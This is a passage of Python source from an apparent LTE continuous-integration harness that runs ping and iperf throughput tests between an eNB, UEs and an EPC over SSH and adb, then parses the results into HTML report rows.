logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
if (packetLossOK):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(qMsg)
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def PingNoS1_wrong_exit(self, qMsg):
html_queue = SimpleQueue()
html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
def PingNoS1(self):
check_eNB = True
check_OAI_UE = True
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ping_from_eNB = re.search('oaitun_enb1', str(self.ping_args))
if ping_from_eNB is not None:
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
else:
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
try:
if ping_from_eNB is not None:
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/cmake_targets/', '\$', 5)
else:
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets/', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
ping_time = re.findall("-c (\d+)",str(self.ping_args))
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with OAI UE crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.PingNoS1_wrong_exit(message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
logging.debug('\u001B[1;37;44m OAI UE ping result \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
self.close()
html_queue = SimpleQueue()
ip_addr = 'TBD'
html_cell = '<pre style="background-color:white">OAI UE ping result\n' + qMsg + '</pre>'
html_queue.put(html_cell)
if packetLossOK:
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
# copying on the EPC server for logCollection
if ping_from_eNB is not None:
copyin_res = self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
else:
copyin_res = self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/ping_' + self.testCase_id + '.log', '.')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'ping_' + self.testCase_id + '.log', self.EPCSourceCodePath + '/scripts')
except:
os.kill(os.getppid(),signal.SIGUSR1)
def Ping(self):
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is not None:
self.PingNoS1()
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
check_OAI_UE = True
else:
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
i = 0
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = self.Ping_common, args = (lock,UE_IPAddress,device_id,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.ping_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
ping_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
ping_status = False
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (ping_status):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def Iperf_ComputeTime(self):
result = re.search('-t (?P<iperf_time>\d+)', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf time Not Found! \u001B[0m')
sys.exit(1)
return result.group('iperf_time')
def Iperf_ComputeModifiedBW(self, idx, ue_num):
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf bandwidth Not Found! \u001B[0m')
sys.exit(1)
iperf_bandwidth = result.group('iperf_bandwidth')
if self.iperf_profile == 'balanced':
iperf_bandwidth_new = float(iperf_bandwidth)/ue_num
if self.iperf_profile == 'single-ue':
iperf_bandwidth_new = float(iperf_bandwidth)
if self.iperf_profile == 'unbalanced':
# residual is 2% of max bw
residualBW = float(iperf_bandwidth) / 50
if idx == 0:
iperf_bandwidth_new = float(iperf_bandwidth) - ((ue_num - 1) * residualBW)
else:
iperf_bandwidth_new = residualBW
iperf_bandwidth_str = '-b ' + iperf_bandwidth
iperf_bandwidth_str_new = '-b ' + ('%.2f' % iperf_bandwidth_new)
result = re.sub(iperf_bandwidth_str, iperf_bandwidth_str_new, str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Calculate Iperf bandwidth Failed! \u001B[0m')
sys.exit(1)
return result
def Iperf_analyzeV2TCPOutput(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
self.command('awk -f /tmp/tcp_iperf_stats.awk /tmp/CI-eNB/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('Avg Bitrate : (?P<average>[0-9\.]+ Mbits\/sec) Max Bitrate : (?P<maximum>[0-9\.]+ Mbits\/sec) Min Bitrate : (?P<minimum>[0-9\.]+ Mbits\/sec)', str(self.ssh.before))
if result is not None:
avgbitrate = result.group('average')
maxbitrate = result.group('maximum')
minbitrate = result.group('minimum')
lock.acquire()
logging.debug('\u001B[1;37;44m TCP iperf result (' + UE_IPAddress + ') \u001B[0m')
msg = 'TCP Stats :\n'
if avgbitrate is not None:
logging.debug('\u001B[1;34m Avg Bitrate : ' + avgbitrate + '\u001B[0m')
msg += 'Avg Bitrate : ' + avgbitrate + '\n'
if maxbitrate is not None:
logging.debug('\u001B[1;34m Max Bitrate : ' + maxbitrate + '\u001B[0m')
msg += 'Max Bitrate : ' + maxbitrate + '\n'
if minbitrate is not None:
logging.debug('\u001B[1;34m Min Bitrate : ' + minbitrate + '\u001B[0m')
msg += 'Min Bitrate : ' + minbitrate + '\n'
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
def Iperf_analyzeV2Output(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
result = re.search('-u', str(iperf_real_options))
if result is None:
return self.Iperf_analyzeV2TCPOutput(lock, UE_IPAddress, device_id, statusQueue, iperf_real_options)
result = re.search('Server Report:', str(self.ssh.before))
if result is None:
result = re.search('read failed: Connection refused', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1;37;41m Could not connect to iperf server! \u001B[0m')
else:
logging.debug('\u001B[1;37;41m Server Report and Connection refused Not Found! \u001B[0m')
return -1
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is not None:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
result = re.search('Server Report:\\\\r\\\\n(?:|\[ *\d+\].*) (?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(\d+\/..\d+) (\((?P<packetloss>[0-9\.]+)%\))', str(self.ssh.before))
if result is not None:
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
jitter = result.group('jitter')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
iperfStatus = True
msg = 'Req Bitrate : ' + req_bandwidth + '\n'
logging.debug('\u001B[1;34m Req Bitrate : ' + req_bandwidth + '\u001B[0m')
if bitrate is not None:
msg += 'Bitrate : ' + bitrate + '\n'
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
result = re.search('(?P<real_bw>[0-9\.]+) [KMG]bits/sec', str(bitrate))
if result is not None:
actual_bw = float(str(result.group('real_bw')))
result = re.search('[0-9\.]+ K', bitrate)
if result is not None:
actual_bw = actual_bw * 1000
result = re.search('[0-9\.]+ M', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000
result = re.search('[0-9\.]+ G', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000000
br_loss = 100 * actual_bw / req_bw
bitperf = '%.2f ' % br_loss
msg += 'Bitrate Perf: ' + bitperf + '%\n'
logging.debug('\u001B[1;34m Bitrate Perf: ' + bitperf + '%\u001B[0m')
if packetloss is not None:
msg += 'Packet Loss : ' + packetloss + '%\n'
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
if float(packetloss) > float(self.iperf_packetloss_threshold):
msg += 'Packet Loss too high!\n'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
iperfStatus = False
if jitter is not None:
msg += 'Jitter : ' + jitter + '\n'
logging.debug('\u001B[1;34m Jitter : ' + jitter + '\u001B[0m')
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
def Iperf_analyzeV2Server(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
if (not os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
return
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is None:
logging.debug('Iperf bandwidth Not Found!')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not compute Iperf bandwidth!')
return
else:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
server_file = open('iperf_server_' + self.testCase_id + '_' + device_id + '.log', 'r')
br_sum = 0.0
ji_sum = 0.0
pl_sum = 0
ps_sum = 0
row_idx = 0
for line in server_file.readlines():
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(?P<lostPack>[0-9]+)/ +(?P<sentPack>[0-9]+)', str(line))
if result is not None:
bitrate = result.group('bitrate')
jitter = result.group('jitter')
packetlost = result.group('lostPack')
packetsent = result.group('sentPack')
br = bitrate.split(' ')
ji = jitter.split(' ')
row_idx = row_idx + 1
curr_br = float(br[0])
pl_sum = pl_sum + int(packetlost)
ps_sum = ps_sum + int(packetsent)
if (br[1] == 'Kbits/sec'):
curr_br = curr_br * 1000
if (br[1] == 'Mbits/sec'):
curr_br = curr_br * 1000 * 1000
br_sum = curr_br + br_sum
ji_sum = float(ji[0]) + ji_sum
if (row_idx > 0):
br_sum = br_sum / row_idx
ji_sum = ji_sum / row_idx
br_loss = 100 * br_sum / req_bw
if (br_sum > 1000):
br_sum = br_sum / 1000
if (br_sum > 1000):
br_sum = br_sum / 1000
bitrate = '%.2f Mbits/sec' % br_sum
else:
bitrate = '%.2f Kbits/sec' % br_sum
else:
bitrate = '%.2f bits/sec' % br_sum
bitperf = '%.2f ' % br_loss
bitperf += '%'
jitter = '%.2f ms' % (ji_sum)
if (ps_sum > 0):
pl = float(100 * pl_sum / ps_sum)
packetloss = '%2.1f ' % (pl)
packetloss += '%'
else:
packetloss = 'unknown'
lock.acquire()
if (br_loss < 90):
statusQueue.put(1)
else:
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
req_msg = 'Req Bitrate : ' + req_bandwidth
bir_msg = 'Bitrate : ' + bitrate
brl_msg = 'Bitrate Perf: ' + bitperf
jit_msg = 'Jitter : ' + jitter
pal_msg = 'Packet Loss : ' + packetloss
statusQueue.put(req_msg + '\n' + bir_msg + '\n' + brl_msg + '\n' + jit_msg + '\n' + pal_msg + '\n')
logging.debug('\u001B[1;37;45m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;35m ' + req_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + bir_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + brl_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + jit_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + pal_msg + '\u001B[0m')
lock.release()
else:
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
server_file.close()
def Iperf_analyzeV3Output(self, lock, UE_IPAddress, device_id, statusQueue):
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?:|[0-9\.]+ ms +\d+\/\d+ \((?P<packetloss>[0-9\.]+)%\)) +(?:|receiver)\\\\r\\\\n(?:|\[ *\d+\] Sent \d+ datagrams)\\\\r\\\\niperf Done\.', str(self.ssh.before))
if result is None:
result = re.search('(?P<error>iperf: error - [a-zA-Z0-9 :]+)', str(self.ssh.before))
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
if result is not None:
logging.debug('\u001B[1;37;41m ' + result.group('error') + ' \u001B[0m')
statusQueue.put(result.group('error'))
else:
logging.debug('\u001B[1;37;41m Bitrate and/or Packet Loss Not Found! \u001B[0m')
statusQueue.put('Bitrate and/or Packet Loss Not Found!')
lock.release()
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
msg = 'Bitrate : ' + bitrate + '\n'
iperfStatus = True
if packetloss is not None:
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
msg += 'Packet Loss : ' + packetloss + '%\n'
if float(packetloss) > float(self.iperf_packetloss_threshold):
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
msg += 'Packet Loss too high!\n'
iperfStatus = False
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
def Iperf_UL_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
udpIperf = True
result = re.search('-u', str(self.iperf_args))
if result is None:
udpIperf = False
ipnumbers = UE_IPAddress.split('.')
if (len(ipnumbers) == 4):
ipnumbers[3] = '1'
EPC_Iperf_UE_IPAddress = ipnumbers[0] + '.' + ipnumbers[1] + '.' + ipnumbers[2] + '.' + ipnumbers[3]
# Launch iperf server on EPC side (true for ltebox and old open-air-cn0
# But for OAI-Rel14-CUPS, we launch from python executor and we are using its IP address as iperf client address
launchFromEpc = True
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
launchFromEpc = False
cmd = 'hostname -I'
ret = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, encoding='utf-8')
if ret.stdout is not None:
EPC_Iperf_UE_IPAddress = ret.stdout.strip()
port = 5001 + idx
if launchFromEpc:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if udpIperf:
self.command('echo $USER; nohup iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
else:
self.command('echo $USER; nohup iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
self.close()
else:
if udpIperf:
cmd = 'nohup iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log 2>&1 &'
else:
cmd = 'nohup iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log 2>&1 &'
logging.debug(cmd + '\n')
subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, encoding='utf-8')
time.sleep(0.5)
# Launch iperf client on UE
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
modified_options = modified_options.replace('-R','')
time.sleep(0.5)
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if (device_id == 'OAI-UE'):
iperf_status = self.command('iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + ' -B ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
else:
iperf_status = self.command('stdbuf -o0 adb -s ' + device_id + ' shell "/data/local/tmp/iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + '" 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
# TIMEOUT Case
if iperf_status < 0:
self.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
# Kill iperf server on EPC side
if launchFromEpc:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('killall --signal SIGKILL iperf', self.EPCUserName, 5)
self.close()
else:
cmd = 'killall --signal SIGKILL iperf'
logging.debug(cmd + '\n')
subprocess.run(cmd, shell=True)
time.sleep(1)
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
# in case of failure, retrieve server log
if (clientStatus == -1):
if launchFromEpc:
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
# in case of OAI-UE
if (device_id == 'OAI-UE'):
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_' + self.testCase_id + '_' + device_id + '.log', '.')
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
def Iperf_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
try:
# Single-UE profile -- iperf only on one UE
if self.iperf_profile == 'single-ue' and idx != 0:
return
useIperf3 = False
udpIperf = True
if (device_id != 'OAI-UE'):
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# if by chance ADB server and EPC are on the same remote host, at least log collection will take care of it
self.command('if [ ! -d ' + self.EPCSourceCodePath + '/scripts ]; then mkdir -p ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
# Checking if iperf / iperf3 are installed
if self.ADBCentralized:
self.command('adb -s ' + device_id + ' shell "ls /data/local/tmp"', '\$', 5)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ls /data/local/tmp"\'', '\$', 60)
result = re.search('iperf3', str(self.ssh.before))
if result is None:
result = re.search('iperf', str(self.ssh.before))
if result is None:
message = 'Neither iperf nor iperf3 installed on UE!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
else:
useIperf3 = True
self.close()
# in case of iperf, UL has its own function
if (not useIperf3):
result = re.search('-R', str(self.iperf_args))
if result is not None:
self.Iperf_UL_common(lock, UE_IPAddress, device_id, idx, ue_num, statusQueue)
return
# Launch the IPERF server on the UE side for DL
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
self.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
udpIperf = False
else:
self.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -u -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
if self.ADBCentralized:
if (useIperf3):
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/iperf3 -s &', '\$', 5)
else:
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
udpIperf = False
else:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
else:
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
self.command('echo $USER; nohup ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &\' > /dev/null 2>&1', self.ADBUserName, 60)
time.sleep(0.5)
self.close()
# Launch the IPERF client on the EPC side for DL (true for ltebox and old open-air-cn
# But for OAI-Rel14-CUPS, we launch from python executor
launchFromEpc = True
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
launchFromEpc = False
if launchFromEpc:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
time.sleep(0.5)
if launchFromEpc:
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
else:
if (os.path.isfile('iperf_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_' + self.testCase_id + '_' + device_id + '.log')
if (useIperf3):
self.command('stdbuf -o0 iperf3 -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
clientStatus = 0
self.Iperf_analyzeV3Output(lock, UE_IPAddress, device_id, statusQueue)
else:
if launchFromEpc:
iperf_status = self.command('stdbuf -o0 iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
else:
cmd = 'iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 > iperf_' + self.testCase_id + '_' + device_id + '.log'
message = cmd + '\n'
logging.debug(cmd)
ret = subprocess.run(cmd, shell=True)
iperf_status = ret.returncode
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cat ' + self.EPCSourceCodePath + '/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if iperf_status < 0:
if launchFromEpc:
self.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
# Kill the IPERF server that runs in background
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('killall iperf', '\$', 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
else:
